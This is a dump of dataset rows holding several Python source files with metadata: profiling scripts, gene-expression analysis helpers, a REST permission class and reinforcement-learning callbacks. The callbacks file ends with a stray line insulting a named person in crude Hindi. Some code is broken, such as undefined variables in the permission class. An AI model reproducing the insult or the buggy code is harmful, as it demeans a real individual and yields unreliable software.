for key, fname in fnames.items():
if (fname.endswith('.tar')):
os.remove(fname)
os.system('rm -rf orig')
| true
| true
|
f7190ba74292947809c2128ff0aaecac93157a21
| 815
|
py
|
Python
|
src/configs/model_id_opts.py
|
rgalhama/public_ICCM2021
|
6a528a26c649da0843b7acbc785aa99b80d29a74
|
[
"MIT"
] | null | null | null |
src/configs/model_id_opts.py
|
rgalhama/public_ICCM2021
|
6a528a26c649da0843b7acbc785aa99b80d29a74
|
[
"MIT"
] | null | null | null |
src/configs/model_id_opts.py
|
rgalhama/public_ICCM2021
|
6a528a26c649da0843b7acbc785aa99b80d29a74
|
[
"MIT"
] | null | null | null |
"""
Author : Raquel G. Alhama
Desc:
"""
def strid_to_opts(strid):
"""
Given model id as string, extract parameter dictionary.
Reverse of config_loader.opts2strid
:param strid:
:return:
"""
raise NotImplementedError
#Method not finished
parts = strid.split("_")
param_keys=",".split("thr,win,dim,neg,dim,size,eig,neg,dyn,cds") #finish
d={}
for i,part in enumerate(parts):
if part == 'post':
pass
elif part in param_keys:
if i<len(parts) and not parts[i+1] not in param_keys:
k=part
v=parts[i+1]
d[k]=v
else: #key without value
k=part
v=1
d[k]=v
else: #value
pass
return d
# for p in parts:
| 22.638889
| 76
| 0.516564
|
def strid_to_opts(strid):
raise NotImplementedError
parts = strid.split("_")
param_keys=",".split("thr,win,dim,neg,dim,size,eig,neg,dyn,cds")
d={}
for i,part in enumerate(parts):
if part == 'post':
pass
elif part in param_keys:
if i<len(parts) and not parts[i+1] not in param_keys:
k=part
v=parts[i+1]
d[k]=v
else:
k=part
v=1
d[k]=v
else:
pass
return d
| true
| true
|
f7190ed8730fa9282a09a7f7c60f4b60d4d29e2d
| 3,453
|
py
|
Python
|
hotelReservation/scripts/cpu_breakdown.py
|
Romero027/DeathStarBench
|
185b61851b7a89277c0c2c1845e18776a9dd7201
|
[
"Apache-2.0"
] | null | null | null |
hotelReservation/scripts/cpu_breakdown.py
|
Romero027/DeathStarBench
|
185b61851b7a89277c0c2c1845e18776a9dd7201
|
[
"Apache-2.0"
] | null | null | null |
hotelReservation/scripts/cpu_breakdown.py
|
Romero027/DeathStarBench
|
185b61851b7a89277c0c2c1845e18776a9dd7201
|
[
"Apache-2.0"
] | null | null | null |
import re
import subprocess
import argparse
import statistics
from pathlib import Path
def parse_args():
parser = argparse.ArgumentParser()
parser.add_argument('--proxy', type=str, default='tcp', help='proxy type (none, tcp, http or grpc)')
parser.add_argument('--app', type=str, help='the name of the application', required=True)
parser.add_argument("-v", "--verbose", action="store_true", help="print the command executed (for debugging purposes)")
return parser.parse_args()
def get_virtual_cores():
print("Running mpstat...")
cpu_util = []
for i in range(3):
cmd = ['mpstat', '1', '15']
# print("Running cmd: " + " ".join(cmd))
output = {}
result = subprocess.run(cmd, stdout=subprocess.PIPE)
result_average = result.stdout.decode("utf-8").split('\n')[-2].split()
overall = 100.00 - float(result_average[-1])
cpu_util.append(overall)
virtual_cores = statistics.mean(cpu_util)*0.64
print("Virutal Cores Usage: " + str(virtual_cores))
return virtual_cores
def get_cpu_percentage(target):
with open("./result/profile.svg", 'r') as fp:
lines = fp.readlines()
sum = 0.0
for line in lines:
if target in line:
# print(line)
l = re.findall(r"\d+\.\d+", line)
# print(l)
sum += float(l[0])
return sum
def generate_flamegraph():
print("Generating Flamegraph...")
cmd1 = ['python3', './profile.py', '-F 99', '-f', '30']
print("Running cmd: " + " ".join(cmd1))
with open("./result/out.profile-folded", "wb") as outfile1:
result = subprocess.run(cmd1, stdout=outfile1)
cmd2 = ['./flamegraph.pl', './result/out.profile-folded']
print("Running cmd: " + " ".join(cmd2))
with open("./result/profile_nosm.svg", "wb") as outfile2:
result = subprocess.run(cmd2, stdout=outfile2)
def get_cpu_breakdown(virtual_cores, proxy, app):
print("Caculating CPU breakdown...")
breakdown = {}
if proxy != "none":
breakdown['read'] = virtual_cores*get_cpu_percentage(">readv (")*0.01
breakdown['loopback'] = virtual_cores*get_cpu_percentage(">process_backlog (")*0.01
breakdown['write'] = virtual_cores*get_cpu_percentage(">writev (")*0.01 - breakdown['loopback']
breakdown['epoll'] = virtual_cores*get_cpu_percentage(">epoll_wait (")*0.01
breakdown['envoy'] = virtual_cores*get_cpu_percentage(">wrk:worker_0 (")*0.01+virtual_cores*get_cpu_percentage(">wrk:worker_1 (")*0.01
breakdown['envoy'] = breakdown['envoy']-(breakdown['read']+breakdown['write']+breakdown['loopback']+breakdown['epoll'])
breakdown['app'] = virtual_cores*get_cpu_percentage(">"+app+" (")*0.01
if proxy == 'http' or proxy =='grpc':
breakdown['http'] = virtual_cores*get_cpu_percentage(">Envoy::Network::FilterManagerImpl::onContinueReading(")*0.01
if proxy != "none":
breakdown['others'] = virtual_cores-(breakdown['read']+breakdown['write']+breakdown['loopback']+breakdown['epoll']+breakdown['envoy']+breakdown['app'])
else:
breakdown['others'] = virtual_cores-breakdown['app']
return breakdown
if __name__ == '__main__':
args = parse_args()
Path("./result").mkdir(parents=True, exist_ok=True)
virtual_cores = get_virtual_cores()
generate_flamegraph()
breakdown = get_cpu_breakdown(virtual_cores, args.proxy, args.app)
print(breakdown)
| 40.151163
| 159
| 0.645526
|
import re
import subprocess
import argparse
import statistics
from pathlib import Path
def parse_args():
parser = argparse.ArgumentParser()
parser.add_argument('--proxy', type=str, default='tcp', help='proxy type (none, tcp, http or grpc)')
parser.add_argument('--app', type=str, help='the name of the application', required=True)
parser.add_argument("-v", "--verbose", action="store_true", help="print the command executed (for debugging purposes)")
return parser.parse_args()
def get_virtual_cores():
print("Running mpstat...")
cpu_util = []
for i in range(3):
cmd = ['mpstat', '1', '15']
output = {}
result = subprocess.run(cmd, stdout=subprocess.PIPE)
result_average = result.stdout.decode("utf-8").split('\n')[-2].split()
overall = 100.00 - float(result_average[-1])
cpu_util.append(overall)
virtual_cores = statistics.mean(cpu_util)*0.64
print("Virutal Cores Usage: " + str(virtual_cores))
return virtual_cores
def get_cpu_percentage(target):
with open("./result/profile.svg", 'r') as fp:
lines = fp.readlines()
sum = 0.0
for line in lines:
if target in line:
l = re.findall(r"\d+\.\d+", line)
sum += float(l[0])
return sum
def generate_flamegraph():
print("Generating Flamegraph...")
cmd1 = ['python3', './profile.py', '-F 99', '-f', '30']
print("Running cmd: " + " ".join(cmd1))
with open("./result/out.profile-folded", "wb") as outfile1:
result = subprocess.run(cmd1, stdout=outfile1)
cmd2 = ['./flamegraph.pl', './result/out.profile-folded']
print("Running cmd: " + " ".join(cmd2))
with open("./result/profile_nosm.svg", "wb") as outfile2:
result = subprocess.run(cmd2, stdout=outfile2)
def get_cpu_breakdown(virtual_cores, proxy, app):
print("Caculating CPU breakdown...")
breakdown = {}
if proxy != "none":
breakdown['read'] = virtual_cores*get_cpu_percentage(">readv (")*0.01
breakdown['loopback'] = virtual_cores*get_cpu_percentage(">process_backlog (")*0.01
breakdown['write'] = virtual_cores*get_cpu_percentage(">writev (")*0.01 - breakdown['loopback']
breakdown['epoll'] = virtual_cores*get_cpu_percentage(">epoll_wait (")*0.01
breakdown['envoy'] = virtual_cores*get_cpu_percentage(">wrk:worker_0 (")*0.01+virtual_cores*get_cpu_percentage(">wrk:worker_1 (")*0.01
breakdown['envoy'] = breakdown['envoy']-(breakdown['read']+breakdown['write']+breakdown['loopback']+breakdown['epoll'])
breakdown['app'] = virtual_cores*get_cpu_percentage(">"+app+" (")*0.01
if proxy == 'http' or proxy =='grpc':
breakdown['http'] = virtual_cores*get_cpu_percentage(">Envoy::Network::FilterManagerImpl::onContinueReading(")*0.01
if proxy != "none":
breakdown['others'] = virtual_cores-(breakdown['read']+breakdown['write']+breakdown['loopback']+breakdown['epoll']+breakdown['envoy']+breakdown['app'])
else:
breakdown['others'] = virtual_cores-breakdown['app']
return breakdown
if __name__ == '__main__':
args = parse_args()
Path("./result").mkdir(parents=True, exist_ok=True)
virtual_cores = get_virtual_cores()
generate_flamegraph()
breakdown = get_cpu_breakdown(virtual_cores, args.proxy, args.app)
print(breakdown)
| true
| true
|
f7190f849149f54de70d0c91038ddc9c7fabd157
| 10,482
|
py
|
Python
|
sccloud/misc/misc.py
|
klarman-cell-observatory/scCloud.py
|
5a04a2f22574db044d018656ac4705ec83840226
|
[
"BSD-3-Clause"
] | 3
|
2019-07-29T12:30:28.000Z
|
2019-09-20T17:15:35.000Z
|
sccloud/misc/misc.py
|
klarman-cell-observatory/scCloud.py
|
5a04a2f22574db044d018656ac4705ec83840226
|
[
"BSD-3-Clause"
] | 3
|
2019-07-24T15:07:31.000Z
|
2019-08-29T13:57:36.000Z
|
sccloud/misc/misc.py
|
klarman-cell-observatory/scCloud.py
|
5a04a2f22574db044d018656ac4705ec83840226
|
[
"BSD-3-Clause"
] | 3
|
2019-07-24T22:50:34.000Z
|
2020-12-08T01:19:34.000Z
|
import numpy as np
import pandas as pd
from typing import List
from anndata import AnnData
from sccloud.io import read_input
def search_genes(
data: AnnData,
gene_list: List[str],
rec_key: str = "de_res",
measure: str = "percentage",
) -> pd.DataFrame:
"""Extract and display gene expressions for each cluster from an `anndata` object.
This function helps to see marker expressions in clusters via the interactive python environment.
Parameters
----------
data: ``anndata.AnnData``
Annotated data matrix containing the expression matrix and differential expression results.
gene_list: ``List[str]``
A list of gene symbols.
rec_key: ``str``, optional, default: ``"de_res"``
Keyword of DE analysis result stored in ``data.varm``.
measure : ``str``, optional, default: ``"percentage"``
Can be either ``"percentage"`` or ``"mean_logExpr"``:
* ``percentage`` shows the percentage of cells expressed the genes;
* ``mean_logExpr`` shows the mean log expression.
Returns
-------
``pandas.DataFrame``
A data frame containing marker expressions in each cluster.
Examples
--------
>>> results = scc.search_genes(adata, ['CD3E', 'CD4', 'CD8'])
"""
columns = [x for x in data.varm[rec_key].dtype.names if x.startswith(measure + ":")]
df = pd.DataFrame(data=data.varm[rec_key][columns], index=data.var_names)
return df.reindex(index=gene_list)
def search_de_genes(
data: AnnData,
gene_list: List[str],
rec_key: str = "de_res",
de_test: str = "fisher",
de_alpha: float = 0.05,
thre: float = 1.5,
) -> pd.DataFrame:
"""Extract and display differential expression analysis results of markers for each cluster.
This function helps to see if markers are up or down regulated in each cluster via the interactive python environment:
* ``++`` indicates up-regulated and fold change >= threshold;
* ``+`` indicates up-regulated but fold change < threshold;
* ``--`` indicates down-regulated and fold change <= 1 / threshold;
* ``-`` indicates down-regulated but fold change > 1 / threshold;
* ``?`` indicates not differentially expressed.
Parameters
----------
data: ``anndata.Anndata``
Annotated data matrix containing the expression matrix and differential expression results.
gene_list: ``List[str]``
A list of gene symbols.
rec_key: ``str``, optional, default: ``"de_res"``
Keyword of DE analysis result stored in ``data.varm``.
de_test : ``str``, optional, default: ``"fisher"``
Differential expression test to look at, could be either ``t``, ``fisher`` or ``mwu``.
de_alpha : ``float``, optional, default: ``0.05``
False discovery rate.
thre : ``float``, optional, default: ``1.5``
Fold change threshold to determine if the marker is a strong DE (``++`` or ``--``) or weak DE (``+`` or ``-``).
Returns
-------
``pandas.DataFrame``
A data frame containing marker differential expression results for each cluster.
Examples
--------
>>> df = sccloud.misc.search_de_genes(adata, ['CD3E', 'CD4', 'CD8'], thre = 2.0)
"""
columns = [
x for x in data.varm[rec_key].dtype.names if x.startswith(de_test + "_qval:")
]
df_de = pd.DataFrame(data.varm[rec_key][columns], index=data.var_names)
df_de = df_de.reindex(index=gene_list)
columns = [
x
for x in data.varm[rec_key].dtype.names
if (
x.startswith("percentage_fold_change:")
if de_test == "fisher"
else x.startswith("log_fold_change:")
)
]
df_fc = pd.DataFrame(data.varm[rec_key][columns], index=data.var_names)
df_fc = df_fc.reindex(index=gene_list)
if de_test != "fisher":
df_fc = np.exp(df_fc)
results = np.zeros((len(gene_list), len(columns)), dtype=np.dtype("U4"))
results[:] = "?"
results[np.isnan(df_de)] = "NaN"
results[(df_de <= de_alpha).values & (df_fc > 1.0).values] = "+"
results[(df_de <= de_alpha).values & (df_fc >= thre).values] = "++"
results[(df_de <= de_alpha).values & (df_fc < 1.0).values] = "-"
results[(df_de <= de_alpha).values & (df_fc <= 1.0 / thre).values] = "--"
clusts = [x.rpartition(":")[2] for x in columns]
df = pd.DataFrame(data=results, index=gene_list, columns=clusts)
return df
def show_attributes(
input_file: str,
show_attributes: bool,
show_gene_attributes: bool,
show_values_for_attributes: str,
) -> None:
""" Show data attributes. For command line use.
"""
data = read_input(input_file, h5ad_mode="r")
if show_attributes:
print(
"Available sample attributes in input dataset: {0}".format(
", ".join(data.obs.columns.values)
)
)
if show_gene_attributes:
print(
"Available gene attributes in input dataset: {0}".format(
", ".join(data.var.columns.values)
)
)
if not show_values_for_attributes is None:
for attr in show_values_for_attributes.split(","):
print(
"Available values for attribute {0}: {1}.".format(
attr, ", ".join(np.unique(data.obs[attr]))
)
)
def perform_oneway_anova(
data: AnnData,
glist: List[str],
restriction_vec: List[str],
group_str: str,
fdr_alpha: float = 0.05,
res_key: str = None,
) -> pd.DataFrame:
"""Perform one way ANOVA on a subset of cells (restricted by restriction_vec) grouped by group_str and control FDR at fdr_alpha.
Parameters
----------
data : `anndata` object
An `anndata` object containing the expression matrix.
glist : `list[str]`
A list of gene symbols.
restriction_vec : `list[str]`
A vector of restrictions for selecting cells. Each restriction takes the format of attr:value,value,value
group_str : `str`
How to group selected cells for ANOVA analysis. If group_str is for pseudotime, it has two formats. 1) 'pseudotime:time:n', which divides cells by equal pseudotime invertal; 2) 'pseudotime:size:n' divides cells by equal number of cells.
fdr_alpha : `float`, optional (default: 0.05)
False discovery rate.
res_key : `str`, optional (default: None)
Store results into data using res_key, the grouping information is stored in obs and the results is stored in uns.
Returns
-------
`pandas.DataFrame`
Results for genes that pass FDR control.
Examples
--------
>>> results = misc.perform_oneway_anova(data, ['CD3E', 'CD4', 'CD8'], [], 'pseudotime:size:10')
"""
from scipy.stats import f_oneway
from statsmodels.stats.multitest import fdrcorrection as fdr
selected = np.ones(data.shape[0], dtype=bool)
for rest_str in restriction_vec:
attr, value_str = rest_str.split(":")
values = value_str.split(",")
selected = selected & np.isin(data.obs[attr], values)
gene_list = np.array(glist)
gene_list = gene_list[np.isin(gene_list, data.var_names)]
ngene = gene_list.size
newdat = data[selected, :][:, gene_list].copy()
newdat.X = newdat.X.toarray()
group_values = group_str.split(":")
group_names = []
col_names = []
ngr = 0
group_idx = None
if group_values[0] == "pseudotime":
assert len(group_values) == 3
div_by = group_values[1]
ngr = int(group_values[2])
group_idx = np.zeros((ngr, newdat.shape[0]), dtype=bool)
pseudotimes = newdat.obs["pseudotime"].values
min_t = pseudotimes.min()
max_t = pseudotimes.max()
if div_by == "time":
interval = (max_t - min_t) / ngr
left = min_t - 1e-5
for i in range(ngr):
right = min_t + interval * (i + 1)
name = "({:.2f}, {:.2f}]".format(left if left >= 0 else 0.0, right)
group_names.append(name)
group_idx[i] = (pseudotimes > left) & (pseudotimes <= right)
left = right
else:
assert div_by == "size"
ords = np.argsort(pseudotimes)
quotient = ords.size // ngr
residule = ords.size % ngr
fr = 0
for i in range(ngr):
to = fr + quotient + (i < residule)
name = "[{:.2f}, {:.2f}]".format(
pseudotimes[ords[fr]], pseudotimes[ords[to - 1]]
)
group_names.append(name)
group_idx[i][ords[fr:to]] = True
fr = to
else:
assert len(group_values) == 2
group_attr = group_values[0]
tmp_str = group_values[1]
groups_str = tmp_str.split(";")
ngr = len(groups_str)
group_idx = np.zeros((ngr, newdat.shape[0]), dtype=bool)
for i, gstr in enumerate(groups_str):
name, values = gstr.split("~")
group_names.append(name)
group_idx[i] = np.isin(newdat.obs[group_attr], values.split(","))
for i in range(ngr):
print("Group {} has {} cells.".format(group_names[i], group_idx[i].sum()))
np.warnings.filterwarnings("ignore")
stats = np.zeros((ngene, 3 + ngr * 2))
for i in range(ngene):
arr_list = []
for j in range(ngr):
arr = newdat.X[group_idx[j], i]
stats[i, 3 + j * 2] = arr.mean()
stats[i, 3 + j * 2 + 1] = (arr > 0).sum() * 100.0 / arr.size
arr_list.append(arr)
stats[i, 0], stats[i, 1] = f_oneway(*arr_list)
if np.isnan(stats[i, 0]):
stats[i, 0] = 0.0
stats[i, 1] = 1.0
passed, stats[:, 2] = fdr(stats[:, 1])
cols = ["fstat", "pval", "qval"]
for i in range(ngr):
cols.extend([group_names[i] + "_mean", group_names[i] + "_percent"])
raw_results = pd.DataFrame(stats, columns=cols, index=gene_list)
results = raw_results[raw_results["qval"] <= fdr_alpha]
results = results.sort_values("qval")
if res_key is not None:
data.uns[res_key] = raw_results
data.obs[res_key] = "background"
for i in range(ngr):
idx = np.zeros(data.shape[0], dtype=bool)
idx[selected] = group_idx[i]
data.obs.loc[idx, res_key] = group_names[i]
return results
| 34.367213
| 244
| 0.592253
|
import numpy as np
import pandas as pd
from typing import List
from anndata import AnnData
from sccloud.io import read_input
def search_genes(
data: AnnData,
gene_list: List[str],
rec_key: str = "de_res",
measure: str = "percentage",
) -> pd.DataFrame:
columns = [x for x in data.varm[rec_key].dtype.names if x.startswith(measure + ":")]
df = pd.DataFrame(data=data.varm[rec_key][columns], index=data.var_names)
return df.reindex(index=gene_list)
def search_de_genes(
data: AnnData,
gene_list: List[str],
rec_key: str = "de_res",
de_test: str = "fisher",
de_alpha: float = 0.05,
thre: float = 1.5,
) -> pd.DataFrame:
columns = [
x for x in data.varm[rec_key].dtype.names if x.startswith(de_test + "_qval:")
]
df_de = pd.DataFrame(data.varm[rec_key][columns], index=data.var_names)
df_de = df_de.reindex(index=gene_list)
columns = [
x
for x in data.varm[rec_key].dtype.names
if (
x.startswith("percentage_fold_change:")
if de_test == "fisher"
else x.startswith("log_fold_change:")
)
]
df_fc = pd.DataFrame(data.varm[rec_key][columns], index=data.var_names)
df_fc = df_fc.reindex(index=gene_list)
if de_test != "fisher":
df_fc = np.exp(df_fc)
results = np.zeros((len(gene_list), len(columns)), dtype=np.dtype("U4"))
results[:] = "?"
results[np.isnan(df_de)] = "NaN"
results[(df_de <= de_alpha).values & (df_fc > 1.0).values] = "+"
results[(df_de <= de_alpha).values & (df_fc >= thre).values] = "++"
results[(df_de <= de_alpha).values & (df_fc < 1.0).values] = "-"
results[(df_de <= de_alpha).values & (df_fc <= 1.0 / thre).values] = "--"
clusts = [x.rpartition(":")[2] for x in columns]
df = pd.DataFrame(data=results, index=gene_list, columns=clusts)
return df
def show_attributes(
input_file: str,
show_attributes: bool,
show_gene_attributes: bool,
show_values_for_attributes: str,
) -> None:
data = read_input(input_file, h5ad_mode="r")
if show_attributes:
print(
"Available sample attributes in input dataset: {0}".format(
", ".join(data.obs.columns.values)
)
)
if show_gene_attributes:
print(
"Available gene attributes in input dataset: {0}".format(
", ".join(data.var.columns.values)
)
)
if not show_values_for_attributes is None:
for attr in show_values_for_attributes.split(","):
print(
"Available values for attribute {0}: {1}.".format(
attr, ", ".join(np.unique(data.obs[attr]))
)
)
def perform_oneway_anova(
data: AnnData,
glist: List[str],
restriction_vec: List[str],
group_str: str,
fdr_alpha: float = 0.05,
res_key: str = None,
) -> pd.DataFrame:
from scipy.stats import f_oneway
from statsmodels.stats.multitest import fdrcorrection as fdr
selected = np.ones(data.shape[0], dtype=bool)
for rest_str in restriction_vec:
attr, value_str = rest_str.split(":")
values = value_str.split(",")
selected = selected & np.isin(data.obs[attr], values)
gene_list = np.array(glist)
gene_list = gene_list[np.isin(gene_list, data.var_names)]
ngene = gene_list.size
newdat = data[selected, :][:, gene_list].copy()
newdat.X = newdat.X.toarray()
group_values = group_str.split(":")
group_names = []
col_names = []
ngr = 0
group_idx = None
if group_values[0] == "pseudotime":
assert len(group_values) == 3
div_by = group_values[1]
ngr = int(group_values[2])
group_idx = np.zeros((ngr, newdat.shape[0]), dtype=bool)
pseudotimes = newdat.obs["pseudotime"].values
min_t = pseudotimes.min()
max_t = pseudotimes.max()
if div_by == "time":
interval = (max_t - min_t) / ngr
left = min_t - 1e-5
for i in range(ngr):
right = min_t + interval * (i + 1)
name = "({:.2f}, {:.2f}]".format(left if left >= 0 else 0.0, right)
group_names.append(name)
group_idx[i] = (pseudotimes > left) & (pseudotimes <= right)
left = right
else:
assert div_by == "size"
ords = np.argsort(pseudotimes)
quotient = ords.size // ngr
residule = ords.size % ngr
fr = 0
for i in range(ngr):
to = fr + quotient + (i < residule)
name = "[{:.2f}, {:.2f}]".format(
pseudotimes[ords[fr]], pseudotimes[ords[to - 1]]
)
group_names.append(name)
group_idx[i][ords[fr:to]] = True
fr = to
else:
assert len(group_values) == 2
group_attr = group_values[0]
tmp_str = group_values[1]
groups_str = tmp_str.split(";")
ngr = len(groups_str)
group_idx = np.zeros((ngr, newdat.shape[0]), dtype=bool)
for i, gstr in enumerate(groups_str):
name, values = gstr.split("~")
group_names.append(name)
group_idx[i] = np.isin(newdat.obs[group_attr], values.split(","))
for i in range(ngr):
print("Group {} has {} cells.".format(group_names[i], group_idx[i].sum()))
np.warnings.filterwarnings("ignore")
stats = np.zeros((ngene, 3 + ngr * 2))
for i in range(ngene):
arr_list = []
for j in range(ngr):
arr = newdat.X[group_idx[j], i]
stats[i, 3 + j * 2] = arr.mean()
stats[i, 3 + j * 2 + 1] = (arr > 0).sum() * 100.0 / arr.size
arr_list.append(arr)
stats[i, 0], stats[i, 1] = f_oneway(*arr_list)
if np.isnan(stats[i, 0]):
stats[i, 0] = 0.0
stats[i, 1] = 1.0
passed, stats[:, 2] = fdr(stats[:, 1])
cols = ["fstat", "pval", "qval"]
for i in range(ngr):
cols.extend([group_names[i] + "_mean", group_names[i] + "_percent"])
raw_results = pd.DataFrame(stats, columns=cols, index=gene_list)
results = raw_results[raw_results["qval"] <= fdr_alpha]
results = results.sort_values("qval")
if res_key is not None:
data.uns[res_key] = raw_results
data.obs[res_key] = "background"
for i in range(ngr):
idx = np.zeros(data.shape[0], dtype=bool)
idx[selected] = group_idx[i]
data.obs.loc[idx, res_key] = group_names[i]
return results
| true
| true
|
f7190fdf620a3e284b95e4499bf5b802e62fd1c4
| 247
|
py
|
Python
|
contacts/permissions.py
|
neyona/underwaterfortunes
|
a48bedc7e25815dea87f743dae21d046d842c713
|
[
"MIT"
] | null | null | null |
contacts/permissions.py
|
neyona/underwaterfortunes
|
a48bedc7e25815dea87f743dae21d046d842c713
|
[
"MIT"
] | 1
|
2020-05-21T13:54:06.000Z
|
2020-05-21T13:54:06.000Z
|
contacts/permissions.py
|
neyona/underwaterfortunes-2020-version
|
a48bedc7e25815dea87f743dae21d046d842c713
|
[
"MIT"
] | null | null | null |
from rest_framework import permissions
class AllPostsPermissions(permissions.BasePermission):
def has_object_permission(self, request, add, obj):
if request.method == "POST":
return self.create(request, *args, **kwargs)
| 27.444444
| 56
| 0.716599
|
from rest_framework import permissions
class AllPostsPermissions(permissions.BasePermission):
def has_object_permission(self, request, add, obj):
if request.method == "POST":
return self.create(request, *args, **kwargs)
| true
| true
|
f71910f3f64e997f951989fb3e889101f8494f4f
| 4,750
|
py
|
Python
|
src/callbacks.py
|
SyedAbidi1/BayesianRLForAutonomousDriving
|
290595683666bb27efba1950fa42306200d6f553
|
[
"MIT"
] | null | null | null |
src/callbacks.py
|
SyedAbidi1/BayesianRLForAutonomousDriving
|
290595683666bb27efba1950fa42306200d6f553
|
[
"MIT"
] | null | null | null |
src/callbacks.py
|
SyedAbidi1/BayesianRLForAutonomousDriving
|
290595683666bb27efba1950fa42306200d6f553
|
[
"MIT"
] | null | null | null |
import numpy as np
from rl.callbacks import Callback
class SaveWeights(Callback):
"""
Callback to regularly save the weights of the neural network.
The weights are only saved after an episode has ended, so not exactly at the specified saving frequency.
Args:
save_freq (int): Training steps between saves
save_path (str): Path where the weights are saved.
"""
def __init__(self, save_freq=10000, save_path=None):
super(SaveWeights, self).__init__()
self.save_freq = save_freq
self.save_path = save_path
self.nb_saves = 0
def on_episode_end(self, episode_step, logs=None):
if (self.nb_saves == 0 or self.model.step - (self.nb_saves - 1) * self.save_freq >= self.save_freq) \
and self.save_path is not None:
print("Number of steps: ", self.model.step)
self.model.save_weights(self.save_path + "/"+str(self.model.step))
self.nb_saves += 1
class EvaluateAgent(Callback):
"""
Callback to evaluate agent on testing episodes.
Args:
eval_freq (int): Training steps between evaluation runs.
nb_eval_eps (int): Number of evaluation episodes.
save_path (int): Path where the result is saved.
"""
def __init__(self, eval_freq=10000, nb_eval_eps=5, save_path=None):
super(EvaluateAgent, self).__init__()
self.eval_freq = eval_freq
self.nb_eval_eps = nb_eval_eps
self.save_path = save_path
self.nb_evaluation_runs = 0
self.store_data_callback = StoreTestEpisodeData(save_path)
self.env = None
def on_episode_end(self, episode_step, logs=None): # Necessary to run testing at the end of an episode
if (self.nb_evaluation_runs == 0 or
self.model.step - (self.nb_evaluation_runs-1) * self.eval_freq >= self.eval_freq) \
and self.save_path is not None:
test_result = self.model.test(self.env, nb_episodes=self.nb_eval_eps, callbacks=[self.store_data_callback],
visualize=False)
with open(self.save_path + '/test_rewards.csv', 'ab') as f:
np.savetxt(f, test_result.history['episode_reward'], newline=' ')
f.write(b'\n')
with open(self.save_path + '/test_steps.csv', 'ab') as f:
np.savetxt(f, test_result.history['nb_steps'], newline=' ')
f.write(b'\n')
self.model.training = True # training is set to False in test function, so needs to be reset here
self.nb_evaluation_runs += 1
class StoreTestEpisodeData(Callback):
"""
Callback to log statistics on the test episodes.
Args:
save_path (int): Path where the result is saved.
"""
def __init__(self, save_path=None):
super(StoreTestEpisodeData, self).__init__()
self.save_path = save_path
self.episode = -1
self.action_data = []
self.reward_data = []
self.q_values_data = None
def on_step_end(self, episode_step, logs=None):
assert(self.model.training is False) # This should only be done in testing mode
if logs is None:
logs = {}
if self.save_path is not None:
if not logs['episode'] == self.episode:
if not self.episode == -1:
with open(self.save_path + '/test_individual_reward_data.csv', 'ab') as f:
np.savetxt(f, self.reward_data, newline=' ')
f.write(b'\n')
with open(self.save_path + '/test_individual_action_data.csv', 'ab') as f:
np.savetxt(f, self.action_data, newline=' ')
f.write(b'\n')
if 'q_values_of_chosen_action' in logs:
with open(self.save_path + '/test_individual_qvalues_data.csv', 'ab') as f:
np.savetxt(f, self.q_values_data, newline='\n')
f.write(b'\n')
self.episode = logs['episode']
self.action_data = []
self.reward_data = []
self.action_data.append(logs['action'])
self.reward_data.append(logs['reward'])
if 'q_values_of_chosen_action' in logs:
self.q_values_data = []
self.q_values_data.append(logs['q_values_of_chosen_action'])
else:
self.action_data.append(logs['action'])
self.reward_data.append(logs['reward'])
if 'q_values_of_chosen_action' in logs:
self.q_values_data.append(logs['q_values_of_chosen_action'])
Abad is a chutiya
| 43.577982
| 119
| 0.592
|
import numpy as np
from rl.callbacks import Callback
class SaveWeights(Callback):
"""
Callback to regularly save the weights of the neural network.
The weights are only saved after an episode has ended, so not exactly at the specified saving frequency.
Args:
save_freq (int): Training steps between saves
save_path (str): Path where the weights are saved.
"""
def __init__(self, save_freq=10000, save_path=None):
super(SaveWeights, self).__init__()
self.save_freq = save_freq
self.save_path = save_path
self.nb_saves = 0
def on_episode_end(self, episode_step, logs=None):
if (self.nb_saves == 0 or self.model.step - (self.nb_saves - 1) * self.save_freq >= self.save_freq) \
and self.save_path is not None:
print("Number of steps: ", self.model.step)
self.model.save_weights(self.save_path + "/"+str(self.model.step))
self.nb_saves += 1
class EvaluateAgent(Callback):
"""
Callback to evaluate agent on testing episodes.
Args:
eval_freq (int): Training steps between evaluation runs.
nb_eval_eps (int): Number of evaluation episodes.
save_path (int): Path where the result is saved.
"""
def __init__(self, eval_freq=10000, nb_eval_eps=5, save_path=None):
super(EvaluateAgent, self).__init__()
self.eval_freq = eval_freq
self.nb_eval_eps = nb_eval_eps
self.save_path = save_path
self.nb_evaluation_runs = 0
self.store_data_callback = StoreTestEpisodeData(save_path)
self.env = None
def on_episode_end(self, episode_step, logs=None):
if (self.nb_evaluation_runs == 0 or
self.model.step - (self.nb_evaluation_runs-1) * self.eval_freq >= self.eval_freq) \
and self.save_path is not None:
test_result = self.model.test(self.env, nb_episodes=self.nb_eval_eps, callbacks=[self.store_data_callback],
visualize=False)
with open(self.save_path + '/test_rewards.csv', 'ab') as f:
np.savetxt(f, test_result.history['episode_reward'], newline=' ')
f.write(b'\n')
with open(self.save_path + '/test_steps.csv', 'ab') as f:
np.savetxt(f, test_result.history['nb_steps'], newline=' ')
f.write(b'\n')
self.model.training = True
self.nb_evaluation_runs += 1
class StoreTestEpisodeData(Callback):
"""
Callback to log statistics on the test episodes.
Args:
save_path (int): Path where the result is saved.
"""
def __init__(self, save_path=None):
super(StoreTestEpisodeData, self).__init__()
self.save_path = save_path
self.episode = -1
self.action_data = []
self.reward_data = []
self.q_values_data = None
def on_step_end(self, episode_step, logs=None):
assert(self.model.training is False)
if logs is None:
logs = {}
if self.save_path is not None:
if not logs['episode'] == self.episode:
if not self.episode == -1:
with open(self.save_path + '/test_individual_reward_data.csv', 'ab') as f:
np.savetxt(f, self.reward_data, newline=' ')
f.write(b'\n')
with open(self.save_path + '/test_individual_action_data.csv', 'ab') as f:
np.savetxt(f, self.action_data, newline=' ')
f.write(b'\n')
if 'q_values_of_chosen_action' in logs:
with open(self.save_path + '/test_individual_qvalues_data.csv', 'ab') as f:
np.savetxt(f, self.q_values_data, newline='\n')
f.write(b'\n')
self.episode = logs['episode']
self.action_data = []
self.reward_data = []
self.action_data.append(logs['action'])
self.reward_data.append(logs['reward'])
if 'q_values_of_chosen_action' in logs:
self.q_values_data = []
self.q_values_data.append(logs['q_values_of_chosen_action'])
else:
self.action_data.append(logs['action'])
self.reward_data.append(logs['reward'])
if 'q_values_of_chosen_action' in logs:
self.q_values_data.append(logs['q_values_of_chosen_action'])
Abad is a chutiya
| false
| true
|
f71911522998ef6b2724c6a05886367f69c73b79
| 4,438
|
py
|
Python
|
test/test_series_io.py
|
waldo2590/thunder
|
